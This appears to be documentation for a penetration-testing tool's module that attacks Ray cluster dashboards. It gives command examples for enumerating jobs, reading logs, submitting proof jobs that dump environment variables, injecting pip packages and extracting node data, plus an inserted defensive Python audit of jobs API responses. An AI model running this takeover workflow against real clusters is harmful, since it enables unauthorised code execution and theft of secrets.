Ray

Enumerate and exploit Ray dashboard and jobs API.

Overview

The ray module targets Ray cluster dashboards, covering metadata enumeration, job listing, log reads, artifact correlation, guarded proof-job submission, and runtime environment validation. It follows a jobs-to-takeover progression with proof-stage metadata on findings.

The jobs API client supports both JSON array responses (Ray 2.10+) and object-wrapped formats from older versions. The jobs command extracts runtime_env and env_vars from each job and emits critical-severity findings when credentials or secrets are found in job environment variables.
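An added example, not aipostex's own code: a defender-side audit of a saved jobs API response that accepts both response shapes and reports secret-looking names under `runtime_env.env_vars` without copying their values. The two wrapper shapes, the `submission_id` field and the name heuristic are assumptions made for this example.

```python
import json
import re

# Name segments treated as secret indicators (a heuristic assumed for this example).
SECRET_SEGMENTS = {"SECRET", "TOKEN", "PASSWORD", "PASSWD", "KEY", "APIKEY", "CREDENTIALS"}

def normalize_jobs(payload):
    """Return a list of job dicts from an array or an object-wrapped response."""
    if isinstance(payload, list):
        return [j for j in payload if isinstance(j, dict)]
    if isinstance(payload, dict):
        # Assumed wrapper shapes: {"<key>": [job, ...]} or {"<job id>": job, ...}.
        for value in payload.values():
            if isinstance(value, list):
                return [j for j in value if isinstance(j, dict)]
        return [{**v, "submission_id": v.get("submission_id", k)}
                for k, v in payload.items() if isinstance(v, dict)]
    raise ValueError("unexpected jobs response shape")

def looks_secret(name):
    """Match whole name segments so TOKENIZERS_PARALLELISM is not flagged."""
    return any(seg in SECRET_SEGMENTS for seg in re.split(r"[^A-Za-z0-9]+", name.upper()))

def audit_jobs(payload):
    """Report secret-looking env var names per job; values are never copied out."""
    findings = []
    for job in normalize_jobs(payload):
        env_vars = (job.get("runtime_env") or {}).get("env_vars") or {}
        for name in sorted(env_vars):
            if looks_secret(name):
                findings.append({"job": job.get("submission_id", "unknown"),
                                 "variable": name, "severity": "critical"})
    return findings

# Constructed sample responses, one per shape; not captured from a real cluster.
SAMPLE_ARRAY = json.loads("""[
  {"submission_id": "raysubmit_A1", "runtime_env": {"env_vars":
    {"AWS_SECRET_ACCESS_KEY": "constructed", "TOKENIZERS_PARALLELISM": "false"}}},
  {"submission_id": "raysubmit_B2", "runtime_env": null}
]""")
SAMPLE_WRAPPED = json.loads("""{
  "raysubmit_C3": {"runtime_env": {"env_vars": {"DB_PASSWORD": "constructed"}}}
}""")

if __name__ == "__main__":
    for sample in (SAMPLE_ARRAY, SAMPLE_WRAPPED):
        for finding in audit_jobs(sample):
            print(finding)
```

Any variable it reports is readable by whoever can reach the jobs API, so it belongs in a secrets manager rather than in `runtime_env`.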

Subcommands

Read-Only (no --force-exploit required)

| Subcommand | Description |
| --- | --- |
| enum | Dashboard metadata and version |
| jobs | List visible jobs |
| job-logs | Read job detail and logs |
| job-artifacts | Extract artifact and log references from a job |

Gated (requires --force-exploit)

| Subcommand | Description |
| --- | --- |
| submit | Submit a proof job through the jobs API |
| runtime-env | Validate runtime_env submission for a job |
| pip-inject | Prove pip injection via runtime_env (arbitrary package install on cluster workers) |
| cluster-info | Exfiltrate cluster resource and node information (IPs, CPU/GPU counts, alive status) |

Flags

| Flag | Required | Description |
| --- | --- | --- |
| --target | Yes | Ray dashboard URL (e.g., http://127.0.0.1:8265) |
| --header | No | Custom HTTP headers. Repeatable. |
| --job-id | For job-logs, job-artifacts, runtime-env | Job ID to inspect |
| --entrypoint | For submit | Job entrypoint command |
| --runtime-env-json | For submit | Runtime environment JSON |
| --proof-preset | For submit | Proof preset name |

Proof Presets

The submit command supports pre-built proof payloads:

| Preset | Description |
| --- | --- |
| env-disclosure | Dump environment variables |
| env-marked | Write a marker to environment |
| fs-survey | Survey filesystem paths |
| runtime-survey | Survey runtime environment |
| beacon | Send a beacon request |
| python-print | Simple Python print statement |

Examples

# Enumerate dashboard
./aipostex ray --target http://127.0.0.1:8265 enum

# List jobs
./aipostex ray --target http://127.0.0.1:8265 jobs

# Read job logs
./aipostex ray --target http://127.0.0.1:8265 job-logs --job-id job-1

# Extract job artifacts
./aipostex ray --target http://127.0.0.1:8265 job-artifacts --job-id job-1

# Submit proof job (gated)
./aipostex ray --target http://127.0.0.1:8265 submit \
  --proof-preset env-disclosure --force-exploit

# Validate runtime-env (gated)
./aipostex ray --target http://127.0.0.1:8265 runtime-env \
  --job-id job-1 --force-exploit

# Prove pip injection via runtime_env (gated)
./aipostex ray --target http://127.0.0.1:8265 pip-inject --force-exploit

# Exfiltrate cluster resource info (gated)
./aipostex ray --target http://127.0.0.1:8265 cluster-info --force-exploit

Proof Stages

Ray findings carry proof-stage metadata:

| Stage | Example |
| --- | --- |
| reachable | Dashboard responds |
| read-confirmed | Job logs successfully read |
| execution-confirmed | Proof job ran and produced output |
| takeover-capable | Runtime environment allows arbitrary code |
| cluster-visible | Cluster resources and node data extracted |
| pip-injectable | Arbitrary pip packages installable on workers |

Workflow Progression

discover network (discovers Ray on :8265)
  → ray enum (dashboard metadata)
    → ray jobs (list visible jobs)
      → ray job-logs --job-id <id> (read logs)
      → ray job-artifacts --job-id <id> (correlate artifacts)
        → ray submit --proof-preset <preset> (proof of execution, gated)
        → ray runtime-env --job-id <id> (validate takeover, gated)
        → ray pip-inject (prove pip injection, gated)
        → ray cluster-info (exfiltrate cluster resources, gated)